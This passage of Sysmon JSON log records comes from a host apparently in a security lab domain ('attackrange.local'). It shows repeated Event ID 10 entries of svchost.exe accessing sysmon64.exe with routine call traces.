C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6364,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6365,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6366,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6367,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6368,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6369,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6370,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.539","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6371,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.539\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 